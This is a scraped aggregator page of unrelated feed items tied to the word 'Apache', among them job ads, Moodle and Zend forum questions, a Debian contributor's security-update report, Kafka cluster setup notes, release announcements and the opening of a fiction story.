Marmaray由我们的Hadoop平台团队设计和开发,是一个建立在Hadoop生态系统之上的基于插件的框架。用户可以新增插件以便从任何来源摄取数据,并利用Apache Spark将数据分散到接收器上。Marmaray这个名字源于土耳其的一条连接欧洲和亚洲的隧道,在Uber内部,我们将Marmaray设想为根据客户偏好将数据从任何来源连接到任何接收器的管道。

By Uber工程博客 Translated by 无明
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          LEGIÃO INVENCÍVEL      Cache   Translate Page      
Este é segundo filme da aclamada Trilogia da Cavalaria do mestre do gênero, John Ford, da qual também fazem parte, Sangue de Heróis - Forte Apache e Rio Bravo. Oficial da Cavalria, Capitão Nathan Brittles - John Wayne, prepara sua volta ao lar. Antes, porém, tem que enfrentar um ataque de índios. História dinâmica, com belíssima fotografia e muita ação, qualidade habituais do mestre. Filme ganhador do Oscar de Melhor Fotografia em cores, para o diretor de fotografia Wisnton Hoch, que também fotografou mais dois filmes de Ford, The Quiet Man e the Serchers.
          Overkill Apache 2      Cache   Translate Page      

https://img-hws.y8.com/cloud/y8-thumbs/10078/big.gif The Apache is back and more powerful than ever! The side-scrolling shoot 'em up sequel gives your more levels, more enemies and more weapons. Guide the chopper through waves of tornado jets, enemy choppers, tanks and more. Destroy everything as you go. Pick up the powerups left by some of the vehicles. Each level ends with an enemy boss with some serious firepower. Caution advised! If pixel 2D shooters are your thing, you've come to the right place.


          Re: Many Issues found in my apache.error.log      Cache   Translate Page      
by Emma Richardson.  

1.  Turn on Moodle debugging and then see if that shows anything.

2.  Disable any plugins in the course - chances are something was added that is incompatible.

3.  Backup the course and restore it and see if that fixes it.

4.  Check the html of all text areas for untoward text (could be a virus of some sort or just incorrect code inserted in a text box or html block that is breaking something in the course...)


          Software Development Engineer - Amazon.com - Seattle, WA      Cache   Translate Page      
Experience with Big Data technology like Apache Hadoop, NoSQL, Presto, etc. Amazon Web Services is seeking an outstanding Software Development Engineer to join...
From Amazon.com - Tue, 02 Oct 2018 19:24:20 GMT - View all Seattle, WA jobs
          TPL, Discovery, and CMDB ah-ha moment (Application Lookup)      Cache   Translate Page      

Hi, Everyone!

 

I got to meet Doug Mueller... Engage 2016 gives you access, (BMC CMDB Architect) and Antonio Vargas (BMC Discovery Product Manager). in person recently.  Here is my recent ah-ha moment with CMDB, and Discovery.  I will start with BMC discovery (ADDM) then move to the CMDB topic of service concept.  There is lots confusion out there on the difference of technical and business service should be within the CMDB.  Some of you might say, I knew that years ago!  But, It took me awhile to grabs the concepts even though we used, implemented, and develop the various BMC products.  I am a visual and tactical learner.  I am writing this blog for those type of students.  Diagram 1 explains The Pattern Language (TPL) and how things are discovery

 

Picture 1 explains the discovery concepts and how things are the development by looking for a pattern within a process(s) running on a device.  Once you find that process you write a pattern or use discovery to find that process via TPL. By using the discovered process, you can now create a software instance(s) by the group the process into the software(s).

 

Screen Shot 2017-06-17 at 8.01.21 AM.png

 

Diagram 2 shows the structure of the TPL base on Diagram 1.  Notice the trigger is on a node of node kind base on the condition.  You now see the relationship between the pattern and the TPL.  Once you define the software instances into business application instance(s).  Once BAI is moved into the CMDB CI called BMC.CORE:BMC_Application.  You have to make a logical entry for BMC.CORE:BMC_ApplicationSystem using non-insteance names.  (The Instance name is production, development, and QA environment coming form BMC Discovery.). Base on your application model you create using the pattern that is consumed by CMDB common data model in different ways.  You also need to know that TPL's foundation is in Python.  Those of you are interested in the pattern, machine learning, and Artificial intelligence.  That's another discussion/blog.

 

Let's look at BAI and SI from the discovery with SAAM and predefine SI that becomes part of a larger model like BSM.

 

SAAM's Business Application Instances are consumed by these forms:

  • BMC.CORE:BMC_Application
  • BMC.CORE:BMC_ApplicationSystem

 

Let's look at the CDM for CMDB forms BMC.CORE:BMC_ApplicaitionSystem and BMC.CORE:BMC_Applicaiton.  You have to understand that parent class is BMC.CORE_ApplicationSystem.  The subclasses are BMC.CORE:BMC_Application, BMC.CORE:BMC_ApplicationInfrastructure, BMC.CORE:BMC_SoftwareServer.  (Basics)

 

CI Name
CI ClassDescription
BMC Atrium Discovery and Dependency Mapping Active Directory Proxy 10.1 identified as Active Directory on %hostname%Parent: BMC.CORE:BMC_ApplicationSystemChild:   BMC.CORE:BMC:SoftwareServerThe BMC_SoftwareServer class represents a single piece of software directly running (or otherwise deployed) on a single computer.
manager module on Apache Tomcat Application Server 7.0 listening on 8005, 8080, 8009 on %hostname%Parent:  BMC.CORE:BMC_SystemServiceChild:    BMC.CORE:BMC_ApplicaitonServiceClass that stores information about services that represent low-level modules of an application, for example, the components deployed within an application server. This class has no corresponding DMTF CIM class.
BSM (Business Service Managment is define pattern via TKU of software instance)Parent:  BMC.CORE:BMC_SystemChild: BMC.CORE:BMC_ApplicationSystemChild:   BMC.CORE:BMC_ApplicationThe BMC_Application class represents an instance of an end-user application that supports a particular business function and that can be managed as an independent unit.

 

By understanding the above and what's documented by discovery leaves ITSM team a decision to make between BMC_SoftwareServer or BMC_ApplicationSystem. Why do you have to make a decision is that BMC discovery sync with both of these CI? (BMC did not make the decision for you.) To understand why, let's review and understand model: FACTS:

  • ApplicationSystem is parent CI.
  • SoftwareServer is child CI of ApplicationSystem.
  • BMC Sync the Business Application instance into BMC_Application CI which is Child CI for ApplicationSystem out of the box.  (OOTB)

 

To be continue.... It is not comsume by the follwing forms:

  • BMC.CORE:BMC_SystemSoftware
  • BMC.CORE:BMC_ApplicationInfrastructure
  • BMC.CORE:BMC_SystemService

 

The way I'd understood @Doug Muller:  There is no direct relationship between business and technical services that relate(s) into BMC.CORE:BMC_ApplicationSystem.  These definitions can be defined by how your business generate revenue with a business service. (If your company makes cars.  Any system that supports selling cars is tied to business services.). Technical services are defined supporting of business service(s).  You can define the technical services without a business service(s).  These are logoical break down of your services based on your organization. 

 

The confusion comes from the type of business your company is providing to its customers and way BMC represents examples of technical vs business service(s). BMC is a company that sells software so a lot of the business services sounds like technical services but, it is not a technical service(s).  Becuase those services help generate revenue for BMC software. 

 

Let's review Why CMDB & Discovery project fail.

 

CMDBDiscovery
Suggestions
Project ScopeThe scope of these projects starts out has let's map the services but, the reality is that there are lots of scope creeps.  The value creation is loose scoped based on my experience.  The value creation for CMDB needs to understand and measure for each ORG.Discovery covers the automation of discovering IT infrastructure at the data center level but, does not cover end to end communications at the network level.  Mapping of BAI isn't scoped right.  BMC has recognized this issue by adding manage service to map application in CMDB.To realize and reduce the education need to use the CMDB.  We need a quick application lookup solution until the whole CMDB and discovery project in completed in scope.
Project ConstraintsHuman Resource, Knowledge Base, Wisdom Base, and Where to start the value creation for an ORG.There isn't a good way to resolving and track Access issue release in a large enterprise environment.

 

Draft thoughts: Service Modeling brain Dump Service Modeling Best Practices comparable CDM fieldsIf you want to learn discovery in detail and how you can answer debated question.  Please start here:  ADDM Support Guide When you create an application mapping in discovery.  You have to create dev, qa, and production instance that sync's into CMDB.  Those instance has to be grouped into relationships and parent class.  The Parent CI is ApplicationSystem use impact relationship to BMC.CORE:BMC_ConcreteCollection CI is used for tore a generic and instantiable collection, such as a pool of hosts available for running jobs. This class is defined as a concrete subclass of BMC_Collection and was added rather than changing BMC_Collection from an abstract class to a concrete class. I'd often get questions about how does discovery provided value to application owners vs management.   Here are some key thoughts about the value the discovery delivers. System Administrator & IT Architecture Value

  • Ability to produce a DR plan with discovery data
  • Ability to understand the impact of shared applications and Infrastructure
  • Provided a common understanding of the Business Application Instances for the company
  • Ability to produce up to date diagram of your application
  • Reduce work production current infrastructure diagrams and inventory for management

Management & C-Suite Value

  • Ability to the audit process, people, data, and tools
    • For Example:  If plan datacenter has 50 hosts to be create but, discovery find 100.
      • Management can ask a question about how the other 50 was created and who is paying for them
  • Understand Share Impact and risk management of applications
  • Ability to the budget datacenter or cloud moves

          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Zend Framework content strange      Cache   Translate Page      

Hi, I have this Zend_Form and it's value get changed.

My input text in the form gets modified like for example:

instead of the text It's a great day I get It\'s a great day

I use

$name = new Zend_Form_Element_Text('name'); $name->setRequired(true); $name->setFilters(array('StringTrim', 'StripTags')); $name->setDecorators(array( 'Errors', 'viewHelper', ));

How can I fix this?

This is due to your php uses magic quoting.

Check if get_magic_quotes_gpc() returns TRUE. If it does then \ ' " & chars in GET and POST request data will get escaped with \ .

To counter that you must use additional filter function like stripslashes() or follow this example to do it properly in Zend Framework: http://blog.philipbrown.id.au/2008/10/zend-framework-forms-and-magic_quotes_gpc/

// Appendix:

On your local machine you can do what the Sudhir explained in his answer, but on a shared hosting that might not be possible unless you have access to php.ini file or PHP is loaded as Apache module (mod_php/mod_php5)


          Markus Koschany: My Free Software Activities in September 2018      Cache   Translate Page      

Welcome to gambaru.de. Here is my monthly report that covers what I have been doing for Debian. If you’re interested in Java, Games and LTS topics, this might be interesting for you.

Debian Games

  • Yavor Doganov continued his heroics in September and completed the port to GTK 3 of teg, a risk-like game. (#907834) Then he went on to fix gnome-breakout.
  • I packaged a new upstream release of freesweep, a minesweeper game, which fixed some minor bugs but unfortunately not #907750.
  • I spent most of the time this month on packaging a newer upstream version of unknown-horizons, a strategy game similar to the old Anno games. After also upgrading the fife engine, fifechan and NMUing python-enet, the game is up-to-date again.
  • More new upstream versions this month: atomix, springlobby, pygame-sdl2, and renpy.
  • I updated widelands to fix an incomplete appdata file (#857644) and to make the desktop icon visible again.
  • I enabled gconf support in morris (#908611) again because gconf will be supported in Buster.
  • Drascula, a classic adventure game, refused to start because of changes to the ScummVM engine. It is working now. (#908864)
  • In other news I backported freeorion to Stretch and sponsored a new version of the runescape wrapper for Carlos Donizete Froes.

Debian Java

  • Only late in September I found the time to work on JavaFX but by then Emmanuel Bourg had already done most of the work and upgraded OpenJFX to version 11. We now have a couple of broken packages (again) because JavaFX is no longer tied to the JRE but is designed more like a library. Since most projects still cling to JavaFX 8 we have to fix several build systems by accommodating those new circumstances.  Surely there will be more to report next month.
  • A Ubuntu user reported that importing furniture libraries was no longer possible in sweethome3d (LP: #1773532) when it is run with OpenJDK 10. Although upstream is more interested in supporting Java 6, another user found a fix which I could apply too.
  • New upstream versions this month: jboss-modules, libtwelvemonkeys-java, robocode, apktool, activemq (RC #907688), cup and jflex. The cup/jflex update required a careful order of uploads because both packages depend on each other. After I confirmed that all reverse-dependencies worked as expected, both parsers are up-to-date again.
  • I submitted two point updates for dom4j and tomcat-native to fix several security issues in Stretch.

Misc

  • Firefox 60 landed in Stretch which broke all xul-* based browser plugins. I thought it made sense to backport at least two popular addons, ublock-origin and https-everywhere, to Stretch.
  • I also prepared another security update for discount (DSA-4293-1) and uploaded  libx11 to Stretch to fix three open CVE.

Debian LTS

This was my thirty-first month as a paid contributor and I have been paid to work 29,25 hours on Debian LTS, a project started by Raphaël Hertzog. In that time I did the following:

  • From 24.09.2018 until 30.09.2018 I was in charge of our LTS frontdesk. I investigated and triaged CVE in dom4j, otrs2, strongswan, python2.7, udisks2, asterisk, php-horde, php-horde-core, php-horde-kronolith, binutils, jasperreports, monitoring-plugins, percona-xtrabackup, poppler, jekyll and golang-go.net-dev.
  • DLA-1499-1. Issued a security update for discount fixing 4 CVE.
  • DLA-1504-1. Issued a security update for ghostscript fixing 14 CVE.
  • DLA-1506-1. Announced a security update for intel-microcode.
  • DLA-1507-1. Issued a security update for libapache2-mod-perl2 fixing 1 CVE.
  • DLA-1510-1. Issued a security update for glusterfs fixing 11 CVE.
  • DLA-1511-1. Issued an update for reportbug.
  • DLA-1513-1. Issued a security update for openafs fixing 3 CVE.
  • DLA-1517-1. Issued a security update for dom4j fixing 1 CVE.
  • DLA-1523-1. Issued a security update for asterisk fixing 1 CVE.
  • DLA-1527-1 and DLA-1527-2. Issued a security update for ghostscript fixing 2 CVE and corrected an incomplete fix for CVE-2018-16543 later.
  • I reviewed and uploaded strongswan and otrs2 for Abhijith PA.

ELTS

Extended Long Term Support (ELTS) is a project led by Freexian to further extend the lifetime of Debian releases. It is not an official Debian project but all Debian users benefit from it without cost. The current ELTS release is Debian 7 „Wheezy“. This was my fourth month and I have been paid to work 15  hours on ELTS.

  • I was in charge of our ELTS frontdesk from 10.09.2018 until 16.09.2018 and I triaged CVE in samba, activemq, chromium-browser, curl, dom4j, ghostscript, firefox-esr, elfutils, gitolite, glib2.0, glusterfs, imagemagick, lcms2, lcms, jhead, libpodofo, libtasn1-3, mgetty, opensc, openafs, okular, php5, smarty3, radare, sympa, wireshark, zsh, zziplib and intel-microcode.
  • ELA-35-1. Issued a security update for samba fixing 1 CVE.
  • ELA-36-1. Issued a security update for curl fixing 1 CVE.
  • ELA-37-2. Issued a regression update for openssh.
  • ELA-39-1. Issued a security update for intel-microcode addressing 6 CVE.
  • ELA-42-1. Issued a security update for libapache2-mod-perl2 fixing 1 CVE.
  • ELA-45-1. Issued a security update for dom4j fixing 1 CVE.
  • I started to work on a security update for the Linux kernel which will be released shortly.

Thanks for reading and see you next time.


          TVS Apache RTR 160 4V: One lakh units sold in just 6 months!      Cache   Translate Page      

TVS Motor Company announced that its popular 160cc motorcycle, the Apache RTR 160 4V has clocked sales of one lakh units since launch. Currently in its third generation, the Apache RTR 160 4V has seen good demand and is one of the best-selling motorcycles in its class. Remarkably, the motorcycle achieved this feat in a […]

The post TVS Apache RTR 160 4V: One lakh units sold in just 6 months! appeared first on BharathAutos - Automobile News Updates.


          批处理按照日期生成文件夹后放入按站点拆分的log日志,出错,求指教      Cache   Translate Page      
想处理apache生成的日志文件,每天按照一定规则提取日志放入当天的文件夹
代码:
@echo off
set year=%date:~0,4%
set month=%date:~5,2%
set day=%date:~8,2%
set path=E:\log\%year%\%year%-%month%\%date:~2,2%-%month%-%day%
if exist %path% (
i
          Check Apache, php, .htaccess settings      Cache   Translate Page      
Quick help needed to check Apache, php, .htaccess settings (Budget: $10 USD, Jobs: Apache, Linux, MySQL, PHP, System Admin)
          Check Apache, php, .htaccess settings      Cache   Translate Page      
Quick help needed to check Apache, php, .htaccess settings (Budget: $10 USD, Jobs: Apache, Linux, MySQL, PHP, System Admin)
          Comment on The HobbyTron.com Hornet 3 Mini RC Helicopter Review by The Silverlit Palm-Z Mini RC Indoor Airplane Review      Cache   Translate Page      
[…] Palm–Z Mini RC Indoor Airplane, available from Hobbytron.com. To date I have test flown the Hornet 3 Mini RC Helicopter and the RC AH-64 Apache RTF 4 CH Electric Helicopter, both also available from HobbyTron.com. With […]
          Comment on The HobbyTron RC AH-64 Apache RTF 4 CH Electric Helicopter Review by The HobbyTron.com Hornet 3 Mini RC Helicopter Review      Cache   Translate Page      
[…] playing with the Hornet 3 helicopter for the review. I think that I was spoiled from flying the Apache helicopter which I reviewed. With the Hornet 3, you have only control over the up/down and left/right turn movement with the […]
          #moto - balita101      Cache   Translate Page      
Traza tus objetivos sin excusas, la vida es un reto que no es fácil pero debes asumir 🚀😎 feliz #martes @adtmotowear #adtmotowear @shafthelmets #goshaft @partequipos_sa #enioils @imbrarepuestos #imbra @mapacheparts #mapacheracing @reeloz_accesorios #reeloz @indeportestolima #indeportestolima #go #race #pits #likeforlikes #mybosi #moto #bike #feria2ruedas #instamotogallery #motorcycle #bogota #picoftheday #fullgas #fullgasscol #tolima #ibagué #carbonworks #mtb #kids #motogp #babymotogp
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Eri MinGob katajin pa cha’em chi ke rajchajinel Wokajil Japache’ ri’      Cache   Translate Page      
  E k’o b’elejeb’ xechapataj pa taq b’anow tzukunik ri’ pa le kiq’atexik nik’aj b’anol k’ax che kakib’an pa kik’aslemal ri winaq ri’, chi’ pa uk’u’x nimatinamt xuquje’ pa le tinamit rech Zacapa, xuquje’ chi ke e k’o e waqib’ ajchajinel rech ri Wokajil Japache’ xechapataj kuk’ ri’. Pa taq le b’anow tzukunik ri’, k’o […]
          today's howtos      Cache   Translate Page      

          DevOps Engineer - Blender Networks - Bedford, NS      Cache   Translate Page      
Bachelor's degree in Computer Science. 5+ years experience in Apache and Tomcat administration and optimization....
From Career Beacon - Thu, 04 Oct 2018 18:38:57 GMT - View all Bedford, NS jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Kafka读书笔记 -- 集群安装与配置(Ubuntu)      Cache   Translate Page      

sudo add-apt-repository ppa:webupd8team/java sudo apt-get update

安装oracle-java8-installer

sudo apt-get install oracle-java8-installer

设置系统默认JDK

sudo update-java-alternatives -s java-8-oracle

下载解压Kafka

mkdir ~/Downloads & cd ~/Downloads wget http://mirrors.hust.edu.cn/apache/kafka/2.0.0/kafka_2.11-2.0.0.tgz mkdir ~/kafka && cd ~/kafka kafka tar -xvzf ~/Downloads/kafka_2.11-2.0.0.tgz --strip 1

允许Kafka删除主题

vim ~/kafka/config/server.properties # 添加 delete.topic.enable=true

定义systemd Zookeeper

sudo vim /etc/systemd/system/zookeeper.service

[Unit] Requires=network.target remote-fs.target After=network.target remote-fs.target [Service] Type=simple User=zhongmingmao ExecStart=/home/zhongmingmao/kafka/bin/zookeeper-server-start.sh /home/zhongmingmao/kafka/config/zookeeper.properties ExecStop=/home/zhongmingmao/kafka/bin/zookeeper-server-stop.sh Restart=on-abnormal [Install] WantedBy=multi-user.target Kafka

sudo vim /etc/systemd/system/kafka.service

[Unit] Requires=zookeeper.service After=zookeeper.service [Service] Type=simple User=zhongmingmao ExecStart=/bin/sh -c '/home/zhongmingmao/kafka/bin/kafka-server-start.sh /home/zhongmingmao/kafka/config/server.properties > /home/zhongmingmao/kafka/kafka.log 2>&1' ExecStop=/home/zhongmingmao/kafka/bin/kafka-server-stop.sh Restart=on-abnormal [Install] WantedBy=multi-user.target 启动

sudo systemctl start kafka sudo systemctl status kafka ● kafka.service Loaded: loaded (/etc/systemd/system/kafka.service; disabled; vendor preset: enabled) Active: active (running) since Mon 2018-10-08 01:52:40 UTC; 6s ago sudo systemctl status zookeeper ● zookeeper.service Loaded: loaded (/etc/systemd/system/zookeeper.service; disabled; vendor preset: enabled) Active: active (running) since Mon 2018-10-08 01:52:40 UTC; 1min 33s ago

查看日志

journalctl -u kafka journalctl -u zookeeper

开机自启动

sudo systemctl enable kafka Created symlink /etc/systemd/system/multi-user.target.wants/kafka.service → /etc/systemd/system/kafka.service.

添加环境变量

vim ~/.zshrc # 添加 KAFKA_HOME="/home/zhongmingmao/kafka/" export PATH=$KAFKA_HOME/bin:$PATH source ~/.zshrc

测试功能 创建主题

kafka-topics.sh --zookeeper localhost:2181 --create --replication-factor 1 --partitions 1 --topic zhongmingmao Created topic "zhongmingmao". kafka-topics.sh --zookeeper localhost:2181 --list zhongmingmao

发送消息

echo "hello, zhongmingmao" | kafka-console-producer.sh --broker-list localhost:9092 --topic zhongmingmao > /dev/null

读取消息

kafka-console-consumer.sh --bootstrap-server localhost:9092 --topic zhongmingmao --from-beginning hello, zhongmingmao

KafkaT 安装

sudo apt install ruby ruby-dev build-essential sudo gem install kafkat

配置

vim ~/.kafkatcfg

{ "kafka_path": "~/kafka", "log_path": "/tmp/kafka-logs", "zk_path": "localhost:2181" }

kafkat partitions Topic Partition Leader Replicas ISRs zhongmingmao 0 0 [0] [0] __consumer_offsets 0 0 [0] [0] 集群 机器IP 172.16.143.133 172.16.143.134 172.16.143.135 创建数据目录

mkdir -p ~/data/zookeeper && mkdir -p ~/data/kafka

配置Zookeeper zookeeper.properties

vim ~/kafka/config/zookeeper.properties

dataDir=/home/zhongmingmao/data/zookeeper clientPort=2181 maxClientCnxns=100 tickTime=2000 initLimit=10 syncLimit=5 server.1=172.16.143.133:2888:3888 server.2=172.16.143.134:2888:3888 server.3=172.16.143.135:2888:3888

新增myid

echo 1 > ~/data/zookeeper/myid # 不同机器,数值为1、2、3

配置Kafka

vim ~/kafka/config/server.properties # 修改下面配置 broker.id=0 # 不同机器,数值为0、1、2 listeners=PLAINTEXT://172.16.143.133:9092 # 机器IP zookeeper.connect=172.16.143.133:2181,172.16.143.134:2181,172.16.143.135:2181 # Zookeeper集群 log.dirs=/home/zhongmingmao/data/kafka

启动Kafka

sudo systemctl start kafka jps 4997 Jps 4331 Kafka 4317 QuorumPeerMain

测试功能 创建主题

# Mac OS kafka-topics --zookeeper 172.16.143.133:2181,172.16.143.134:2181,172.16.143.135:2181 --create --replication-factor 1 --partitions 1 --topic zhongmingmao Created topic "zhongmingmao". kafka-topics --zookeeper 172.16.143.133:2181,172.16.143.134:2181,172.16.143.135:2181 --list zhongmingmao # --zookeeper 可以只列一个

发送消息

# Mac OS echo "hello, zhongmingmao" | kafka-console-producer --broker-list 172.16.143.133:9092,172.16.143.134:9092,172.16.143.135:9092, --topic zhongmingmao > /dev/null

读取消息

# Mac OS kafka-console-consumer --bootstrap-server 172.16.143.133:9092,172.16.143.134:9092,172.16.143.135:9092 --topic zhongmingmao --from-beginning hello, zhongmingmao

修改KafkaT

vim ~/.kafkatcfg

{ "kafka_path": "/home/zhongmingmao/kafka", "log_path": "/home/zhongmingmao/data/kafka", "zk_path": "172.16.143.133:2181,172.16.143.134:2181,172.16.143.135:2181" }

kafkat partitions Topic Partition Leader Replicas ISRs zhongmingmao 0 2 [2] [2] __consumer_offsets 0 1 [1] [1]
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Comment on Geronimo ~ Apache Indian Chief by jesus M. Ortega      Cache   Translate Page      
I am a fifth generation descendant of Manuela "Nena" Torres, supposed sister of Geronimo; and married to Juan "El Duro" Murga. They resided in Chihuahua after marriage; and they are related to the Murga brothers that rode with and then, later against Pancho Villa. My grandfather is Ramon Murga Teran. My DNA test results show that I have over 45% Apache/Native American heritage. Any information would be greatly appreciated.
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          moodle site crash after plugin installation      Cache   Translate Page      
by Γεώργιος Σάλαρης.  

Hello

I work on a moodle platform and i tried to install a theme plugin. The installation was successfull but when i tried to update the database it got stuck and from then i get the message thta appears below.

My error log in cpanel shows the information as shown below.


I am kind of desperate because i tried some thing i found here for example delete the theme folder. 

I also went through the file explorer and there is no such file as lib.php in the path /cache/lib.

I would appreciate every thought and help.

Thank you in advance.  


Moodle version is 2.9

PHP version 5.3.26

Apache version 2.4.29

MySql version 5.6.36 - 82.1


          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          SENIOR SOFTWARE ENGINEER – WEB DEVELOPER - West Virginia Radio Corporation - Morgantown, WV      Cache   Translate Page      
PHP, Apache, MySQL, WordPress, JavaScript, jQuery, JSON, REST, XML, RSS, HTML5, CSS3, Objective-C, Java, HLS Streaming, CDNs, Load Balancing....
From West Virginia Radio Corporation - Tue, 18 Sep 2018 10:09:25 GMT - View all Morgantown, WV jobs
          Registration Now Open for DataStax Accelerate!      Cache   Translate Page      
DataStax Accelerate will feature separate executive and technical tracks, as well as training, hands-on sessions, an exhibitor pavilion, networking, and a full presentation agenda from DataStax executives, customers, and partners. Learn from your peers, industry experts, and thought leaders on how Apache Cassandra and DataStax can help you build and deploy game-changing enterprise applications and easily scale your data needs to fit your company’s growth and today’s hybrid and multi-cloud world.
          TypeScript 3.1.2 发布,微软推出的 JavaScript 超集      Cache   Translate Page      

TypeScript 3.1.2 已发布,这是针对 3.1.1 的 bug 修复版本,解决了几个用户报告的 issues 。

TypeScript 3.1 更新亮点:

详情

TypeScript 是由微软开发的自由和开源的编程语言,是 JavaScript 类型的超集,它可以编译成纯 JavaScript ,可以在任何浏览器、任何计算机和任何操作系统上运行。

下载地址:


          Apache Tika 1.19.1 发布,内容抽取工具集合      Cache   Translate Page      

Apache Tika 1.19.1 已发布,Tika 是一个内容抽取的工具集合(a toolkit for text extracting)。它集成了 POI 和 Pdfbox,并且为文本抽取工作提供了一个统一的界面。其次,Tika 也提供了便利的扩展 API,用来丰富其对第三方文件格式的支持。

Apache Tika 1.19.1 主要包括对 MP3Parser 和 SAX 解析处理的两个关键 bug 修复,具体如下:

  • Update PDFBox to 2.0.12, jempbox to 1.8.16 and jbig2 to 3.0.2

  • Fix regression in parser for MP3 files 

  • Updated Python Dependency Check for TesseractOCR

  • Improve SAXParser robustness

  • Remove dependency on slf4j-log4j12 by upgrading jmatio

  • Replace com.sun.xml.bind:jaxb-impl and jaxb-core with org.glassfish.jaxb:jaxb-runtime and jaxb-core

下载地址:

http://tika.apache.org/download.html


          Apache Arrow 0.11.0 发布,内存数据交换格式      Cache   Translate Page      

Apache Arrow 0.11.0 已发布。Apache Arrow 是 Apache 基金会的顶级项目之一,目的是作为一个跨平台的数据层来加快大数据分析项目的运行速度。它包含一组规范的内存中的平面和分层数据表示,以及多种语言绑定以进行结构操作。 它还提供低架构流式传输和批量消息传递,零拷贝进程间通信(IPC)和矢量化的内存分析库。

该版本包含大量改进和修复,部分亮点如下:

  • Support for CUDA-based GPUs in Python

  • New MATLAB bindings

  • R Library in Development

  • C++ CSV Reader Project

  • Parquet C GLib Bindings Donation

  • Parquet and Arrow C++ communities joining forces

  • Arrow Flight RPC and Messaging Framework

完整更新内容请查阅更新日志:

https://arrow.apache.org/release/0.11.0.html

下载地址:

https://arrow.apache.org/install/


          Apache Qpid Proton 0.26.0 发布,轻量级消息库      Cache   Translate Page      

Apache Qpid Proton 0.26.0 已发布,Apache Qpid Proton 是 AMQP 1.0 的消息库,高性能,轻量级,应用广泛。

新特性和改进

  • PROTON-1888 - [python] Allow configuration of connection details via a simple config file

  • PROTON-1935 - [cpp] Read a config file to get default connection parameters

  • PROTON-1940 - [c] normalize encoding of multiple="true" fields

bug 修复

  • PROTON-1928 - install static libraries

  • PROTON-1929 - [c] library prints directly to stderr/stdout

  • PROTON-1934 - [Python] Backoff class is not exported by reactor

  • PROTON-1942 - [c] decoding a message does not set the inferred flag.

下载地址:


          Apache Portals Pluto Remote Code Execution (CVE-2018-1306)      Cache   Translate Page      
A vulnerability exists in Apache Portals Pluto, The vulnerability is due to improper handling of http methods. A remote attacker can exploit this vulnerability by submitting a crafted request to the target server.
                Cache   Translate Page      
 


Why Do You Fight?
 

A story written for Big Brother
 
By E. John Evans
(All rights reserved. Please do not redistribute in any form without express permission.)


Matt was riding along a bumpy dusty road heading out into the high desert of New Mexico. He had come here in his off time to train. His Sire, Elder, as well as a few others had kept him busy with training and learning new skills as he grew from a cub into a Bear. This trip was to learn tracking from a Pueblo Elder and a style of combat that was simple, yet brutal from the Apache Elder. This trip was deeply troubling to Matt. Something in the back of his mind was screaming at him to run away. Something was pulling at him to Not Be Here. Something in the world was off, but he could just not place it, could not decider the code that was running through his head like a never ending ticker tape. Stuffing that in the back of his mind, be sat and thumbed through one of his journal books. This particular journal had been written before Matt departed the military. Contained on the pages were some of his times abroad, with all the gory, ugly details. He flashed back to a few of the moments, but the way it was written was not quite how he was remembering it. Matt thought the difference was due to his more acute perception since becoming a Werecreature. His 